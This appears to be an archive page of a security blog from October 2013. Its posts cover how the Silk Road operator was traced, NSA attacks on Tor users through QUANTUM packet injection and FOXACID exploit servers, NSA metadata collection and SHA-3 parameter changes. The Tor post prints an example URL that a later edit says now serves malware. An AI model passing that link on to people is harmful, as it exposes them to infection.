Posted on October 8, 2013 at 6:44 AM • 42 Comments

Silk Road Author Arrested Due to Bad Operational Security

Details of how the FBI found the administrator of Silk Road, a popular black market e-commerce site.

Despite the elaborate technical underpinnings, however, the complaint portrays Ulbricht as a drug lord who made rookie mistakes. In an October 11, 2011 posting to a Bitcoin Talk forum, for instance, a user called “altoid” advertised he was looking for an “IT pro in the Bitcoin community” to work in a venture-backed startup. The post directed applicants to send responses to “rossulbricht at gmail dot com.” It came about nine months after two previous posts—also made by a user, “altoid,” to shroomery.org and Bitcoin Talk—were among the first to advertise a hidden Tor service that operated as a kind of “anonymous amazon.com.” Both of the earlier posts referenced silkroad420.wordpress.com.

If altoid’s solicitation for a Bitcoin-conversant IT Pro wasn’t enough to make Ulbricht a person of interest in the FBI’s ongoing probe, other digital bread crumbs were sure to arouse agents’ suspicions. The Google+ profile tied to the rossulbricht@gmail.com address included a list of favorite videos originating from mises.org, a website of the “Mises Institute.” The site billed itself as the “world center of the Austrian School of economics” and contained a user profile for one Ross Ulbricht. Several Dread Pirate Roberts postings on Silk Road cited the “Austrian Economic theory” and the works of Mises Institute economists Ludwig von Mises and Murray Rothbard in providing the guiding principles for the illicit drug market.

The clues didn’t stop there. In early March 2012 someone created an account on StackOverflow with the username Ross Ulbricht and the rossulbricht@gmail.com address, the criminal complaint alleged. On March 16 at 8:39 in the morning, the account was used to post a message titled “How can I connect to a Tor hidden service using curl in php?” Less than one minute later, the account was updated to change the user name from Ross Ulbricht to “frosty.” Several weeks later, the account was again updated, this time to replace the Ulbricht gmail address with frosty@frosty.com. In July 2013, a forensic analysis of the hard drives used to run one of the Silk Road servers revealed a PHP script based on curl that contained code that was identical to that included in the Stack Overflow discussion, the complaint alleged.

We already know that it is next to impossible to maintain privacy and anonymity against a well-funded government adversary.

EDITED TO ADD (10/8): Another article.

Posted on October 7, 2013 at 1:35 PM • 73 Comments

How the NSA Attacks Tor/Firefox Users With QUANTUM and FOXACID

The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA’s application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.

According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software. The trick identifies Tor users on the Internet and then executes an attack against their Firefox web browser.

The NSA refers to these capabilities as CNE, or computer network exploitation.

The first step of this process is finding Tor users. To accomplish this, the NSA relies on its vast capability to monitor large parts of the Internet. This is done via the agency’s partnership with US telecoms firms under programs codenamed Stormbrew, Fairview, Oakstar and Blarney.

The NSA creates “fingerprints” that detect HTTP requests from the Tor network to particular servers. These fingerprints are loaded into NSA database systems like XKeyscore, a bespoke collection and analysis tool that NSA boasts allows its analysts to see “almost everything” a target does on the Internet.
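
Such fingerprints are essentially pattern matches over observed traffic. As one simplified illustration (my own sketch, not an actual NSA fingerprint or XKeyscore rule): the list of Tor relays is published in the public Tor consensus, so a flow to or from an address on that list can be flagged.

    # Simplified illustration of a traffic "fingerprint" for Tor: flag flows
    # whose source or destination appears in the published Tor relay list.
    # This is my own sketch, not an actual NSA fingerprint or XKeyscore rule.

    # In practice the relay list comes from the public Tor consensus; the
    # addresses below are placeholders.
    tor_relay_ips = {"198.51.100.7", "203.0.113.42"}

    observed_flows = [
        {"src": "192.0.2.10", "dst": "198.51.100.7", "dport": 9001},   # client -> Tor relay
        {"src": "203.0.113.42", "dst": "192.0.2.80", "dport": 80},     # Tor exit -> web server
        {"src": "192.0.2.11", "dst": "93.184.216.34", "dport": 80},    # ordinary web traffic
    ]

    def matches_tor_fingerprint(flow: dict) -> bool:
        return flow["src"] in tor_relay_ips or flow["dst"] in tor_relay_ips

    flagged = [f for f in observed_flows if matches_tor_fingerprint(f)]
    print(len(flagged), "of", len(observed_flows), "flows flagged")  # 2 of 3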

Using powerful data analysis tools with codenames such as Turbulence, Turmoil and Tumult, the NSA automatically sifts through the enormous amount of Internet traffic that it sees, looking for Tor connections.

Last month, Brazilian TV news show Fantastico showed screenshots of an NSA tool that had the ability to identify Tor users by monitoring Internet traffic.

The very feature that makes Tor a powerful anonymity service, and the fact that all Tor users look alike on the Internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.

After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FoxAcid, to infect the user’s computer. FoxAcid is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems.

Once the computer is successfully attacked, it secretly calls back to a FoxAcid server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information back to the NSA.

Exploiting the Tor browser bundle

Tor is a well-designed and robust anonymity tool, and successfully attacking it is difficult. The NSA attacks we found individually target Tor users by exploiting vulnerabilities in their Firefox browsers, and not the Tor application directly.

This, too, is difficult. Tor users often turn off vulnerable services like scripts and Flash when using Tor, making it difficult to target those services. Even so, the NSA uses a series of native Firefox vulnerabilities to attack users of the Tor browser bundle.

According to the training presentation provided by Snowden, EgotisticalGiraffe exploits a type confusion vulnerability in E4X, which is an XML extension for JavaScript. This vulnerability exists in Firefox 11.0–16.0.2, as well as Firefox 10.0 ESR—the Firefox version used until recently in the Tor browser bundle. According to another document, the vulnerability exploited by EgotisticalGiraffe was inadvertently fixed when Mozilla removed the E4X library with the vulnerability, and when Tor added that Firefox version into the Tor browser bundle, but NSA were confident that they would be able to find a replacement Firefox exploit that worked against version 17.0 ESR.

The Quantum system

To trick targets into visiting a FoxAcid server, the NSA relies on its secret partnerships with US telecoms companies. As part of the Turmoil system, the NSA places secret servers, codenamed Quantum, at key places on the Internet backbone. This placement ensures that they can react faster than other websites can. By exploiting that speed difference, these servers can impersonate a visited website to the target before the legitimate website can respond, thereby tricking the target’s browser into visiting a FoxAcid server.

In the academic literature, these are called “man-in-the-middle” attacks, and have been known to the commercial and academic security communities. More specifically, they are examples of “man-on-the-side” attacks.

They are hard for any organization other than the NSA to reliably execute, because they require the attacker to have a privileged position on the Internet backbone, and exploit a “race condition” between the NSA server and the legitimate website. This top-secret NSA diagram, made public last month, shows a Quantum server impersonating Google in this type of attack.
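
The “race condition” is ultimately a latency contest: the injected response only works if it reaches the target’s browser before the legitimate one, which is why placement on the backbone matters so much. A toy simulation of that race, with invented latency numbers:

    import random

    # Toy model of the man-on-the-side race: the browser accepts whichever
    # response arrives first. The latency numbers are invented; the point is
    # that a server sitting on the backbone near the target wins essentially
    # every time.

    def race(trials: int = 10000) -> float:
        wins = 0
        for _ in range(trials):
            legit_rtt = random.uniform(40, 120)    # ms to the real web server
            injector_rtt = random.uniform(2, 15)   # ms from the on-path server
            if injector_rtt < legit_rtt:
                wins += 1
        return wins / trials

    print(f"injected response arrives first in {race():.1%} of trials")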

The NSA uses these fast Quantum servers to execute a packet injection attack, which surreptitiously redirects the target to the FoxAcid server. An article in the German magazine Spiegel, based on additional top-secret Snowden documents, mentions an NSA-developed attack technology with the name of QuantumInsert that performs redirection attacks. Another top-secret Tor presentation provided by Snowden mentions QuantumCookie to force cookies onto target browsers, and another Quantum program to “degrade/deny/disrupt Tor access”.

This same technique is used by the Chinese government to block its citizens from reading censored Internet content, and has been hypothesized as a probable NSA attack technique.

The FoxAcid system

According to various top-secret documents provided by Snowden, FoxAcid is the NSA codename for what the NSA calls an “exploit orchestrator,” an Internet-enabled system capable of attacking target computers in a variety of different ways. It is a Windows 2003 computer configured with custom software and a series of Perl scripts. These servers are run by the NSA’s tailored access operations, or TAO, group. TAO is another subgroup of the systems intelligence directorate.

The servers are on the public Internet. They have normal-looking domain names, and can be visited by any browser from anywhere; ownership of those domains cannot be traced back to the NSA.

However, if a browser tries to visit a FoxAcid server with a special URL, called a FoxAcid tag, the server attempts to infect that browser, and then the computer, in an effort to take control of it. The NSA can trick browsers into using that URL using a variety of methods, including the race-condition attack mentioned above and frame injection attacks.

FoxAcid tags are designed to look innocuous, so that anyone who sees them would not be suspicious. http://baseball2.2ndhalfplays.com/nested/attribs/bins/1/define/forms9952_z1zzz.html is an example of one such tag, given in another top-secret training presentation provided by Snowden.

There is no currently registered domain name by that name; it is just an example for internal NSA training purposes.

The training material states that merely trying to visit the homepage of a real FoxAcid server will not result in any attack, and that a specialized URL is required. This URL would be created by TAO for a specific NSA operation, and unique to that operation and target. This allows the FoxAcid server to know exactly who the target is when his computer contacts it.

According to Snowden, FoxAcid is a general CNE system, used for many types of attacks other than the Tor attacks described here. It is designed to be modular, with flexibility that allows TAO to swap and replace exploits if they are discovered, and only run certain exploits against certain types of targets.

The most valuable exploits are saved for the most important targets. Low-value exploits are run against technically sophisticated targets where the chance of detection is high. TAO maintains a library of exploits, each based on a different vulnerability in a system. Different exploits are authorized against different targets, depending on the value of the target, the target’s technical sophistication, the value of the exploit, and other considerations.

In the case of Tor users, FoxAcid might use EgotisticalGiraffe against their Firefox browsers.

According to a top-secret operational management procedures manual provided by Snowden, once a target is successfully exploited it is infected with one of several payloads. Two basic payloads mentioned in the manual are designed to collect configuration and location information from the target computer so an analyst can determine how to further infect the computer.

These decisions are made in part by the technical sophistication of the target and the security software installed on the target computer, called Personal Security Products or PSP, in the manual.

FoxAcid payloads are updated regularly by TAO. For example, the manual refers to version 8.2.1.1 of one of them.

FoxAcid servers also have sophisticated capabilities to avoid detection and to ensure successful infection of their targets. The operations manual states that a FoxAcid payload with the codename DireScallop can circumvent commercial products that prevent malicious software from making changes to a system that survive a reboot process.

The NSA also uses phishing attacks to induce users to click on FoxAcid tags.

TAO additionally uses FoxAcid to exploit callbacks—which is the general term for a computer infected by some automatic means—calling back to the NSA for more instructions and possibly to upload data from the target computer.

According to a top-secret operational management procedures manual, FoxAcid servers configured to receive callbacks are codenamed FrugalShot. After a callback, the FoxAcid server may run more exploits to ensure that the target computer remains compromised long term, as well as install “implants” designed to exfiltrate data.

By 2008, the NSA was getting so much FoxAcid callback data that they needed to build a special system to manage it all.

This essay previously appeared in the Guardian. It is the technical article associated with this more general-interest article. I also wrote two commentaries on the material.

EDITED TO ADD: Here is the source material we published. The Washington Post published its own story independently, based on some of the same source material and some new source material.

Here’s the official US government response to the story.

The Guardian decided to change the capitalization of the NSA codenames. They should properly be in all caps: FOXACID, QUANTUMCOOKIE, EGOTISTICALGIRAFFE, TURMOIL, and so on.

This is the relevant quote from the Spiegel article:

According to the slides in the GCHQ presentation, the attack was directed at several Belgacom employees and involved the planting of a highly developed attack technology referred to as a “Quantum Insert” (“QI”). It appears to be a method with which the person being targeted, without their knowledge, is redirected to websites that then plant malware on their computers that can then manipulate them. Some of the employees whose computers were infiltrated had “good access” to important parts of Belgacom’s infrastructure, and this seemed to please the British spies, according to the slides.

That should be “QUANTUMINSERT.” This is getting frustrating. The NSA really should release a style guide for press organizations publishing their secrets.

And the URL in the essay (now redacted at the Guardian site) was registered within minutes of the story posting, and is being used to serve malware. Don’t click on it.

Posted on October 7, 2013 at 6:24 AM • 129 Comments

Developments in Microphone Technology

What’s interesting is that this matchstick-sized microphone can be attached to drones.

Conventional microphones work when sound waves make a diaphragm move, creating an electrical signal. Microflown’s sensor has no moving parts. It consists of two parallel platinum strips, each just 200 nanometres deep, that are heated to 200° C. Air molecules flowing across the strips cause temperature differences between the pair. Microflown’s software counts the air molecules that pass through the gap between the strips to gauge sound intensity: the more air molecules in a sound wave, the louder the sound. At the same time, it analyses the temperature change in the strips to work out the movement of the air and calculate the coordinates of whatever generated the sound.

EDITED TO ADD (10/6): This seems not to be a microphone, but an acoustic sensor. It can locate sound, but cannot differentiate speech.

Posted on October 4, 2013 at 6:59 AM • 68 Comments

Is Cybersecurity a Profession?

A National Academy of Sciences panel says no:

Sticking to the quality control aspect of the report, professionalization, it says, has the potential to attract workers and establish long-term paths to improving the work force overall, but measures such as standardized education or requirements for certification have their disadvantages too.

For example, formal education or certification could be helpful to employers looking to evaluate the skills and knowledge of a given applicant, but it takes time to develop curriculum and reach a consensus on what core knowledge and skills should be assessed in order to award any such certification. For direct examples of such a quandary, InfoSec needs only to look at the existing certification programs, and the criticisms directed at certifications such as the CISSP and C|EH.

Once a certification is issued, the previously mentioned barriers start to emerge. The standards used to award certifications will run the risk of becoming obsolete. Furthermore, workers may not have incentives to update their skills in order to remain current. Again, this issue is seen in the industry today, as some professionals choose to let their certifications lapse rather than renew them or try to collect the required CPE credits.

But the largest barrier is that some of the most talented individuals in cybersecurity are self-taught. So the requirement of formal education or training may, as mentioned, deter potential employees from entering the field at a time when they are needed the most. So while professionalization may be a useful tool in some circumstances, the report notes, it shouldn’t be used as a proxy for “better.”

Here’s the report.

Posted on October 3, 2013 at 12:55 PM • 41 Comments

On Anonymous

Gabriella Coleman has published an interesting analysis of the hacker group Anonymous:

Abstract: Since 2010, digital direct action, including leaks, hacking and mass protest, has become a regular feature of political life on the Internet. The source, strengths and weaknesses of this activity are considered in this paper through an in-depth analysis of Anonymous, the protest ensemble that has been adept at magnifying issues, boosting existing – usually oppositional – movements and converting amorphous discontent into a tangible form. This paper, the third in the Internet Governance Paper Series, examines the intersecting elements that contribute to Anonymous’ contemporary geopolitical power: its ability to land media attention, its bold and recognizable aesthetics, its participatory openness, the misinformation that surrounds it and, in particular, its unpredictability.

Posted on October 3, 2013 at 6:43 AM • 21 Comments

On Secrecy

“When everything is classified, then nothing is classified.”

I should suppose that moral, political, and practical considerations would dictate that a very first principle of that wisdom would be an insistence upon avoiding secrecy for its own sake. For when everything is classified, then nothing is classified, and the system becomes one to be disregarded by the cynical or the careless, and to be manipulated by those intent on self protection or self-promotion. I should suppose, in short, that the hallmark of a truly effective internal security system would be the maximum possible disclosure, recognizing that secrecy can best be preserved only when credibility is truly maintained.

Justice Stewart, New York Times v. United States, 1971.

Posted on October 2, 2013 at 1:28 PM • 62 Comments

NSA Storing Internet Data, Social Networking Data, on Pretty Much Everybody

Two new stories based on the Snowden documents.

This is getting silly. General Alexander just lied about this to Congress last week. The old NSA tactic of hiding behind a shell game of different code names is failing. It used to be they could get away with saying “Project X doesn’t do that,” knowing full well that Projects Y and Z did and that no one would call them on it. Now they’re just looking shiftier and shiftier.

The program the New York Times exposed is basically Total Information Awareness, which Congress defunded in 2003 because it was just too damned creepy. Now it’s back. (Actually, it never really went away. It just changed code names.)

I’m also curious how all those PRISM-era denials from Internet companies about the NSA not having “direct access” to their servers jibe with this paragraph:

The overall volume of metadata collected by the N.S.A. is reflected in the agency’s secret 2013 budget request to Congress. The budget document, disclosed by Mr. Snowden, shows that the agency is pouring money and manpower into creating a metadata repository capable of taking in 20 billion “record events” daily and making them available to N.S.A. analysts within 60 minutes.

Honestly, I think the details matter less and less. We have to assume that the NSA has everyone who uses electronic communications under constant surveillance. New details about hows and whys will continue to emerge—for example, now we know the NSA’s repository contains travel data—but the big picture will remain the same.

Related: I’ve said that it seems that the NSA now has a PR firm advising it on response. It’s trying to teach General Alexander how to better respond to questioning.

Also related: A cute flowchart on how to avoid NSA surveillance.

Posted on October 1, 2013 at 1:08 PM • 67 Comments

Will Keccak = SHA-3?

Last year, NIST selected Keccak as the winner of the SHA-3 hash function competition. Yes, I would have rather my own Skein had won, but it was a good choice.

But last August, John Kelsey announced some changes to Keccak in a talk (slides 44-48 are relevant). Basically, the security levels were reduced and some internal changes to the algorithm were made, all in the name of software performance.

Normally, this wouldn’t be a big deal. But in light of the Snowden documents that reveal that the NSA has attempted to intentionally weaken cryptographic standards, this is a huge deal. There is too much mistrust in the air. NIST risks publishing an algorithm that no one will trust and no one (except those forced) will use.

At this point, they simply have to standardize on Keccak as submitted and as selected.

CDT has a great post about this.

Also this Slashdot thread.

EDITED TO ADD (10/5): It’s worth reading the response from the Keccak team on this issue.

I misspoke when I wrote that NIST made “internal changes” to the algorithm. That was sloppy of me. The Keccak permutation remains unchanged. What NIST proposed was reducing the hash function’s capacity in the name of performance. One of Keccak’s nice features is that it’s highly tunable.
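
The tunable parameter is the capacity c: with the Keccak-f[1600] permutation, each call absorbs r = 1600 - c message bits, and the generic security level of the sponge is roughly c/2 bits. Lowering the capacity raises the rate and therefore the speed, but the speed comes directly out of the security margin, which is exactly the trade-off at issue. A quick illustration of the arithmetic (the capacity values are examples, not NIST’s final SHA-3 parameters):

    # Sponge parameter arithmetic for Keccak-f[1600]: rate + capacity = 1600,
    # and the generic security level is capacity / 2 bits. The capacity values
    # below are examples to show the trade-off, not NIST's final SHA-3 parameters.

    PERMUTATION_WIDTH = 1600

    def sponge_params(capacity: int) -> dict:
        return {
            "capacity": capacity,
            "rate": PERMUTATION_WIDTH - capacity,   # message bits absorbed per call
            "generic_security_bits": capacity // 2,
        }

    for c in (512, 256):
        p = sponge_params(c)
        print(f"c={p['capacity']}: rate={p['rate']}, generic security ~{p['generic_security_bits']} bits")

    # A higher rate means fewer permutation calls per message byte (faster
    # hashing), but it is bought directly from the security margin.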

I do not believe that the NIST changes were suggested by the NSA. Nor do I believe that the changes make the algorithm easier to break by the NSA. I believe NIST made the changes in good faith, and the result is a better security/performance trade-off. My problem with the changes isn’t cryptographic, it’s perceptual. There is so little trust in the NSA right now, and that mistrust is reflecting on NIST. I worry that the changed algorithm won’t be accepted by an understandably skeptical security community, and that no one will use SHA-3 as a result.

This is a lousy outcome. NIST has done a great job with cryptographic competitions: both a decade ago with AES and now with SHA-3. This is just another effect of the NSA’s actions draining the trust out of the Internet.

Posted on October 1, 2013 at 10:50 AM • 57 Comments

WhoIs Privacy and Proxy Service Abuse

ICANN has a draft study that looks at abuse of the Whois database.

This study, conducted by the National Physical Laboratory (NPL) in the United Kingdom, analyzes gTLD domain names to measure whether the percentage of privacy/proxy use among domains engaged in illegal or harmful Internet activities is significantly greater than among domain names used for lawful Internet activities. Furthermore, this study compares these privacy/proxy percentages to other methods used to obscure identity – notably, Whois phone numbers that are invalid.

Richard Clayton, the primary author of the report, has a blog post:

However, it’s more interesting to ask whether this percentage is somewhat higher than the usage of privacy or proxy services for entirely lawful and harmless Internet activities? This turned out NOT to be the case – for example, banks use privacy and proxy services almost as often as the registrants of domains used in the hosting of child sexual abuse images; and the registrants of domains used to host (legal) adult pornography use privacy and proxy services more often than most (but not all) of the different types of malicious activity that we studied.

Richard has been telling me about this work for a while. It’s nice to see it finally published.

Posted on October 1, 2013 at 9:09 AM • 14 Comments
